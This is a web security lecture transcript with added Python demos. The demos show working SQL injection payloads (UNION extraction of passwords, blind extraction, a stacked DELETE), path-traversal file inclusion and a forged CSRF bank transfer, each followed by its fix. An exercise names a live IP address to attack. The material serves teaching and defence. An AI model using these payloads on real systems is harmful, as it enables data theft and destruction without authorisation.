Web Security
Hello everyone. This lesson belongs to the BCSE lesson series. Today we will study an important session
of Information Security: attacks and defenses in the web environment, that is, Web Security. This is
a really important part of system security.
Slide 2
Content
1 Basic knowledge
4 Exercise
Tr 2
Basic knowledge
Tr 3
Tr 4
A website system has three components that take part in executing a request: the web server, the web application, and the database.
The web server is a server running software that serves the web. It listens for requests from users,
processes those requests, and sends the results back to the browser. The browser then displays
these results to the user.
The web application is where the server-side script or code that builds the application runs. Some
popular server-side languages are PHP, ASP.NET, JSP, Python, ...
The database is where the web application stores all of its data and performs operations through
queries. Some popular relational database management systems are MySQL, SQL Server, and Oracle.
There are also non-relational (NoSQL) database management systems, such as MongoDB.
Understanding the components of a website system gives us a general view, from which we can look for the weaknesses of the
website.
Slide 5
HTTP protocol
HyperText Transfer Protocol
Application-level protocol
Connects client and server
Used for the World Wide Web
Tr 5
Tr 6
Tr 7
Tr 8
The status code belongs to the response. It is a three-digit number: the first digit defines
the class of the response and the next two digits give its specific meaning.
Codes starting with 1 (1xx): informational; the request was received and is being processed.
Codes starting with 2 (2xx): success; the request was accepted and handled successfully.
Codes starting with 3 (3xx): redirection; further action is needed to complete the request, for example a redirect
(302).
Codes starting with 4 (4xx): client error; the request has bad syntax or cannot be
fulfilled.
Codes starting with 5 (5xx): server error; the server failed to process a valid request.
Slide 9
Cookie
HTTP cookie, Web cookie, Browser
cookie
A small piece of data saved in the
user's browser
Size about 4 KB
Stores state or information about the
user's actions
Tr 9
Next, cookies.
You may think of it as a cake, but it is not.
A cookie, also called an HTTP cookie, web cookie, or browser cookie, is a small piece of data (about
4 KB in size) sent from the web server to the browser and stored in that browser when the user accesses
the website. It is used to store the state or actions of the user (for example, whether the user has visited the
website before, how many times the user has visited it, which products are in the basket, ...).
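To make the last two slides concrete, here is an added example (not part of the lecture) that parses a raw HTTP/1.1 response the way a browser does, classifies the status code by its first digit, reads the Set-Cookie headers with their attributes, and builds the follow-up request in which the browser sends the cookies back. The response bytes, host name and cookie names are constructed for this example.

```python
"""Added example (not part of the lecture): parse a raw HTTP/1.1 response,
classify its status code, extract the cookies it sets, and build the next
request with those cookies attached. All sample data is constructed."""
from dataclasses import dataclass, field

# Constructed sample response; host and cookie names are made up.
RAW_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /home\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Set-Cookie: session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    b"Set-Cookie: visits=3; Path=/\r\n"
    b"Content-Length: 12\r\n"
    b"\r\n"
    b"Redirecting."
)

STATUS_CLASSES = {
    1: "informational",   # request received, processing continues
    2: "success",         # request accepted and handled
    3: "redirection",     # further action needed, e.g. follow Location
    4: "client error",    # bad syntax or request cannot be fulfilled
    5: "server error",    # a valid request could not be processed
}

MAX_COOKIE_BYTES = 4096   # the "about 4 KB" per-cookie limit browsers apply


@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict = field(default_factory=dict)   # lower-cased attribute -> value or True


@dataclass
class Response:
    version: str
    status: int
    reason: str
    headers: list   # (name, value) pairs; duplicates such as Set-Cookie are kept
    body: bytes

    def status_class(self) -> str:
        return STATUS_CLASSES.get(self.status // 100, "unknown")

    def header(self, name: str):
        for k, v in self.headers:
            if k.lower() == name.lower():
                return v
        return None

    def cookies(self) -> list:
        out = []
        for k, v in self.headers:
            if k.lower() != "set-cookie":
                continue
            parts = [p.strip() for p in v.split(";")]
            name, _, value = parts[0].partition("=")
            attrs = {}
            for attr in parts[1:]:
                key, _, val = attr.partition("=")
                attrs[key.lower()] = val if val else True
            if len(parts[0].encode()) > MAX_COOKIE_BYTES:
                attrs["oversized"] = True      # browsers silently drop such cookies
            out.append(Cookie(name, value, attrs))
        return out


def parse_response(raw: bytes) -> Response:
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    status_line = lines[0].split(" ", 2) + [""]          # reason phrase may be absent
    version, code, reason = status_line[0], status_line[1], status_line[2]
    if not version.startswith("HTTP/") or not code.isdigit() or len(code) != 3:
        raise ValueError(f"bad status line: {lines[0]!r}")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    resp = Response(version, int(code), reason, headers, body)
    length = resp.header("Content-Length")
    if length is not None:
        resp.body = body[: int(length)]                   # ignore trailing bytes
    return resp


def build_request(method: str, path: str, host: str, cookies: list) -> bytes:
    """The browser's next request to the same site: stored cookies are attached
    automatically, which is also what CSRF later relies on."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    if cookies:
        lines.append("Cookie: " + "; ".join(f"{c.name}={c.value}" for c in cookies))
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


if __name__ == "__main__":
    r = parse_response(RAW_RESPONSE)
    print(r.status, r.reason, r.status_class(), "->", r.header("Location"))
    for c in r.cookies():
        print(c)
    print(build_request("GET", "/home", "ebanking.vn", r.cookies()).decode())
```

The HttpOnly and Secure attributes on the session cookie are worth noticing now: they are what later limits the damage of the XSS and session-hijacking scenarios in this lesson.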
Slide 10
Tr 10
Tr 11
The most familiar and dangerous vulnerability is SQL injection. This is a technique that lets an
attacker take advantage of weak validation of input data in web applications (and of the error
messages of the database management system that are sent back to the client) to inject and execute illegal SQL
commands.
This fault often occurs in web applications whose data is managed by a database management
system such as SQL Server, MySQL, or Oracle.
Slide 12
Tr 12
Exploiting SQL injection lets attackers add, modify, and delete data in the application's
database. More dangerously, an attacker may be able to install a webshell on the
system and gain control of the server.
Slide 13
Tr 13
Tr 14
According to the developers of sqlmap, a free and effective tool for detecting and
exploiting SQL injection, there are five main techniques for exploiting SQL injection: boolean-based
blind, time-based blind, error-based, UNION query, and stacked queries.
First, boolean-based blind: the idea of this technique is to use true/false comparisons to
find each character of the information we want, such as a table name or column name.
Because the search space is large, this kind of exploitation is mainly done with tools.
Time-based blind: this technique relies on the server's processing time for different requests to
determine each character of a table or column name.
Next, error-based: this relies on the error messages of the database management system. It
can only be used when the web application is configured to display the error messages of the
database management system.
Fourth, UNION queries. This is a popular method when exploiting SQL injection. Its
principle is to use the UNION keyword to append the results of an attacker-chosen SELECT to the results of the original query, and so retrieve information
from the database.
The last one is stacked queries, also called piggy-backing. By adding the character ; (the
statement separator in SQL), we can execute several SQL commands in one request,
for example SELECT * FROM products WHERE productid=1; DELETE FROM products
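The following added example (not from the lecture) puts three of the five techniques above into working code against a deliberately vulnerable SQLite lookup: boolean-based blind extraction character by character, a UNION query pulling rows from another table, and the stacked-query payload from the slide. It also shows the parameterised fix. The tables, their contents and the secret being extracted are constructed for this example. Time-based blind uses the same loop as the boolean one with a delay as the signal, and error-based needs DBMS error text in the page, so neither is shown.

```python
"""Added example (not part of the lecture): vulnerable SQLite lookup, three
sqlmap techniques run against it, and the parameterised fix. All data is
constructed for the example."""
import sqlite3

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(productid INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'laptop'), (2, 'phone');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn


# Vulnerable: the request parameter is pasted into the SQL text.
def product_names_vulnerable(conn, productid: str) -> list:
    sql = "SELECT name FROM products WHERE productid=" + productid
    return [row[0] for row in conn.execute(sql)]


# Fixed: the value is bound as a parameter and can never become SQL syntax.
def product_names_fixed(conn, productid: str) -> list:
    sql = "SELECT name FROM products WHERE productid=?"
    return [row[0] for row in conn.execute(sql, (productid,))]


def union_attack(conn) -> list:
    """UNION query: append attacker-chosen rows (same column count) to the result."""
    return product_names_vulnerable(conn, "1 UNION SELECT password FROM users")


def blind_length(conn, column: str, table: str, limit: int = 64) -> int:
    """Boolean-based blind, step 1: find the length of the secret.
    The only signal is whether the row for productid=1 comes back."""
    for n in range(1, limit + 1):
        probe = f"1 AND length((SELECT {column} FROM {table} LIMIT 1))={n}"
        if product_names_vulnerable(conn, probe):
            return n
    raise RuntimeError("length not found")


def blind_extract(conn, column: str, table: str) -> str:
    """Boolean-based blind, step 2: recover the secret one character at a time."""
    recovered = ""
    for pos in range(1, blind_length(conn, column, table) + 1):
        for ch in CHARSET:
            probe = f"1 AND substr((SELECT {column} FROM {table} LIMIT 1),{pos},1)='{ch}'"
            if product_names_vulnerable(conn, probe):
                recovered += ch
                break
        else:
            recovered += "?"          # character outside CHARSET
    return recovered


def stacked_attack(conn, via_executescript: bool) -> bool:
    """Stacked queries: ';' ends the intended statement and a DELETE follows.
    Whether this works depends on how the application runs SQL: sqlite3's
    execute() refuses multiple statements, executescript() runs them all.
    Returns True if the DELETE actually ran."""
    sql = "SELECT name FROM products WHERE productid=1; DELETE FROM products"
    try:
        if via_executescript:
            conn.executescript(sql)
        else:
            conn.execute(sql)
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return False
    return conn.execute("SELECT count(*) FROM products").fetchone()[0] == 0


if __name__ == "__main__":
    db = make_db()
    print("union  :", union_attack(db))
    print("blind  :", blind_extract(db, "password", "users"))
    print("stacked via execute():", stacked_attack(make_db(), False),
          "via executescript():", stacked_attack(make_db(), True))
    print("fixed  :", product_names_fixed(db, "1 UNION SELECT password FROM users"))
```

The stacked-query case is the caveat to remember: the same payload succeeds or fails depending on the database driver and how the application submits queries, which is why sqlmap tests each technique separately.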
Slide 15
XSS (1)
Cross-Site Scripting
This technique enables a hacker to inject
malicious script into a website that has
vulnerabilities
Tr 16
Let's move to the second vulnerability: XSS. Cross-Site Scripting is a technique that enables a
hacker to inject malicious script into a website.
Slide 17
XSS (2)
Threats
End user's information gets stolen
Admin account is taken over
Offensive images are inserted into the website,
damaging its reputation
Tr 17
XSS enables a hacker to execute malicious script in the user's browser. As a result, the user's
information can be stolen, the administrator account of the administration page can be taken over, and the website can be
defaced with offensive images, which damages the reputation of the company or organization that owns it.
Slide 18
XSS (3)
Exploits
Reflected XSS
Stored XSS
DOM Based XSS
Tr 18
In general, XSS is divided into three main types: Reflected XSS, Stored XSS, and DOM-based XSS.
Slide 19
XSS (4)
Reflected XSS
Tr 19
The first is Reflected XSS. There are many ways to exploit Reflected XSS; one of them is
to hijack the user's session, after which the attacker can access the user's data and act with the user's permissions on the website.
Look at the screen. This is the scenario of a Reflected XSS attack.
First, the user logs in to a website and is assigned a session. By some means, the hacker sends
the user an exploitation URL. The victim opens this URL, and the server responds to the victim with
the data from the request (the hacker's JavaScript) echoed back. The victim's browser executes the JavaScript, and the victim's session is
sent to the hacker. Then the hacker can impersonate the victim and use all of the victim's permissions on the website.
Slide 20
XSS (5)
Stored XSS
Tr 20
XSS (6)
Stored XSS
Tr 21
XSS (7)
DOM based XSS
Tr 22
Tr 23
Next, we move on to errors related to unsafe file handling, including File Inclusion
and Insecure File Upload.
Slide 24
Tr 24
File Inclusion
This is a common vulnerability in web applications that enables a hacker to read sensitive files on the
server; more dangerously, the hacker can use log poisoning to get a webshell onto the server.
Slide 25
Tr 25
There are two types of File Inclusion: Local File Inclusion (LFI) and Remote File Inclusion (RFI).
LFI is a technique that makes the website include and read a file from its own server, so the hacker can read a lot of sensitive
information on the server, such as the files /etc/passwd, php.ini, ...
The second type is RFI, a technique that includes a file from another server; the content of
that file can be malicious (a web shell, ...).
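The following added example (not from the lecture) shows the LFI case in code: a PHP-style "page=" include written in Python, where the vulnerable version joins the parameter onto the pages directory (so "../" segments and absolute paths escape it), and the hardened version resolves the real path and refuses anything outside the directory. The site layout and file contents are constructed for this example; RFI (including a URL) is not modelled.

```python
"""Added example (not part of the lecture): a 'page=' include vulnerable to
path traversal, and a version that enforces containment in the pages
directory. The webroot is constructed in a temporary directory."""
import os
import tempfile


def setup_site(root: str) -> str:
    """Create pages/home.html plus a config file one level up, like a real webroot."""
    pages = os.path.join(root, "pages")
    os.makedirs(pages)
    with open(os.path.join(pages, "home.html"), "w") as f:
        f.write("<h1>home</h1>")
    with open(os.path.join(root, "config.php"), "w") as f:   # must never be served
        f.write("<?php $db_password = 's3cret'; ?>")
    return pages


def include_vulnerable(pages_dir: str, page: str) -> str:
    # LFI: os.path.join keeps '..' segments, and discards pages_dir entirely
    # when page is absolute, so ../config.php or /etc/passwd is readable.
    with open(os.path.join(pages_dir, page)) as f:
        return f.read()


def include_fixed(pages_dir: str, page: str) -> str:
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, page))
    # realpath resolves '..' and symlinks; commonpath then proves containment.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to include {page!r}: outside {base}")
    with open(target) as f:
        return f.read()


def lfi_demo() -> dict:
    """Run both versions against a normal page, a traversal payload and an
    absolute-path payload; return what each version returned."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        pages = setup_site(root)
        payloads = {
            "home.html": "home.html",
            "traversal": "../config.php",
            "absolute": os.path.join(root, "config.php"),
        }
        for label, payload in payloads.items():
            results[("vulnerable", label)] = include_vulnerable(pages, payload)
            try:
                results[("fixed", label)] = include_fixed(pages, payload)
            except PermissionError:
                results[("fixed", label)] = "BLOCKED"
    return results


if __name__ == "__main__":
    for (version, label), outcome in lfi_demo().items():
        print(f"{version:10} {label:10} -> {outcome}")
```

An allowlist of page names is simpler still where the set of pages is fixed; the realpath check is the general form, and it also covers the symlink case that a plain string check on ".." misses.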
Slide 26
Tr 26
CSRF (1)
One-click attack, session riding, XSRF
A type of attack which tricks the end
user into performing unwanted actions
on a web application
Tr 27
CSRF, also called one-click attack, session riding, or XSRF, is a type of attack that tricks the end
user into performing unwanted actions on a web application.
Slide 28
CSRF (2)
Threats
The user performs unwanted requests
without being aware of it
Loss of data
Loss of money
Damage to the image and reputation of users
...
Tr 28
CSRF (3)
Example:
A wants to transfer money to B
through the Internet Banking service at
the website ebanking.vn
The URL that performs this request is:
http://ebanking.com/transfer.do?acct
=B&amount=100
Tr 29
CSRF (4)
Example:
By some means, C learns the structure
of this URL and changes it to
http://ebanking.com/transfer.do?acct=C&
amount=100
C tricks A into making this request (while
A is logged in)
C gains $100!
Tr 30
- By some means, C learns the structure of this URL and changes it to:
http://ebanking.com/transfer.do?acct=C&amount=100
- C tricks A into making this request (while A is logged in)
- C gains $100
To trick A into making this request, C can for example send the URL by email or
Facebook; nowadays most URLs are shortened, so it is hard for the victim to guess what the link does.
Slide 31
CSRF (5)
Analysis of causes:
Web applications often manage users
through cookies
The web browser automatically attaches
the cookie to every request sent to
http://bank.vn, no matter who caused
that request to be sent.
Tr 31
CSRF (6)
Analysis of causes
If http://bank.vn has no mechanism to
recognize that a request was sent from
http://attacker.vn, the attacker has
complete control over the user's session
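The ebanking transfer from the slides, as an added example (not from the lecture) in a small simulation. The bank identifies the user by a session cookie, and the simulated browser attaches that cookie to every request for ebanking.com whichever page caused it, exactly as the "analysis of causes" slides describe. transfer_vulnerable() trusts the cookie alone, so the request fired from the attacker's page goes through; transfer_fixed() additionally demands a per-session anti-CSRF token that attacker.vn cannot read, and rejects requests whose Sec-Fetch-Site metadata says they are cross-site. Accounts, amounts and the attacker page are constructed for this example.

```python
"""Added example (not part of the lecture): CSRF against a cookie-only
transfer endpoint, and the fix with a synchronizer token plus fetch metadata.
Accounts, balances and URLs are constructed."""
import secrets
from urllib.parse import parse_qs, urlsplit

BANK_ORIGIN = "http://ebanking.com"


class Bank:
    def __init__(self):
        self.balances = {"A": 500, "B": 0, "C": 0}
        self.sessions = {}          # session cookie -> (user, csrf token)

    def login(self, user: str) -> str:
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = (user, secrets.token_hex(16))
        return cookie

    def csrf_token(self, cookie: str) -> str:
        """Embedded in the bank's own transfer form; only same-origin pages can read it."""
        return self.sessions[cookie][1]

    def _move(self, src: str, dst: str, amount: int) -> None:
        if amount <= 0 or self.balances[src] < amount:
            raise ValueError("bad amount")
        self.balances[src] -= amount
        self.balances[dst] += amount

    def transfer_vulnerable(self, request: dict) -> bool:
        user, _ = self.sessions[request["cookie"]]      # cookie alone = identity
        q = parse_qs(urlsplit(request["url"]).query)
        self._move(user, q["acct"][0], int(q["amount"][0]))
        return True

    def transfer_fixed(self, request: dict) -> bool:
        user, expected = self.sessions[request["cookie"]]
        if request.get("sec_fetch_site") not in ("same-origin", "none"):
            return False                                  # cross-site request
        token = request.get("token") or ""
        if not secrets.compare_digest(token, expected):
            return False                                  # missing or forged token
        q = parse_qs(urlsplit(request["url"]).query)
        self._move(user, q["acct"][0], int(q["amount"][0]))
        return True


class Browser:
    """Stores cookies per host and attaches them to every request for that host."""
    def __init__(self):
        self.cookies = {}

    def request(self, url: str, from_page: str = None, token: str = None) -> dict:
        host = urlsplit(url).netloc
        if from_page is None:
            site = "none"                                 # typed URL / link in mail
        elif urlsplit(from_page).netloc == host:
            site = "same-origin"
        else:
            site = "cross-site"
        return {"url": url, "cookie": self.cookies.get(host),
                "sec_fetch_site": site, "token": token}


# Constructed attacker page: an <img> whose src is the forged transfer URL.
ATTACKER_PAGE = "http://attacker.vn/funny-cats.html"
FORGED_URL = f"{BANK_ORIGIN}/transfer.do?acct=C&amount=100"


def csrf_demo(handler_name: str) -> dict:
    """Run a legitimate transfer and the forged one through the named handler."""
    bank, browser = Bank(), Browser()
    browser.cookies["ebanking.com"] = bank.login("A")      # A is logged in
    handler = getattr(bank, handler_name)
    # A, on the bank's own page, sends 100 to B with the form's token.
    legit = browser.request(f"{BANK_ORIGIN}/transfer.do?acct=B&amount=100",
                            from_page=f"{BANK_ORIGIN}/transfer.html",
                            token=bank.csrf_token(browser.cookies["ebanking.com"]))
    # A then views the attacker's page; the <img> fires the forged request
    # with A's cookie attached automatically but without the token.
    forged = browser.request(FORGED_URL, from_page=ATTACKER_PAGE)
    return {"legit": handler(legit), "forged": handler(forged), "balances": bank.balances}


if __name__ == "__main__":
    for name in ("transfer_vulnerable", "transfer_fixed"):
        print(name, csrf_demo(name))
```

The token is the primary defence; the Sec-Fetch-Site check is defence in depth that only modern browsers send. Re-authenticating the transfer (asking for the password or a one-time code again), as the solutions slides suggest, has the same effect because the attacker's page cannot supply that either.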
Tr 32
OS Command Injection
Tr 33
SOLUTIONS
The next part of the lesson covers solutions and prevention of the threats from web vulnerabilities.
Slide 35
Solutions
Safe programming
Strictly validate the user's input data
on the client
on the server
Encode data sent back to the client
Re-authenticate important operations,
for example money transfers
Tr 35
Solutions
System configuration
Set strong passwords
Never keep default settings
Grant minimum permissions to users and
to the system
Tr 36
Solutions
Update software and services to the
latest version
Disable unnecessary services on the system
Tr 37
Exercise
Tr 38
Requirements:
• Access the address:
128.199.140.34:1337
• Exploit the following
vulnerabilities: SQL injection, XSS, LFI
Tr 39
Requirements:
Access the address on the slide
Exploit the following vulnerabilities: SQL injection, XSS, LFI
Slide 40
Tr 40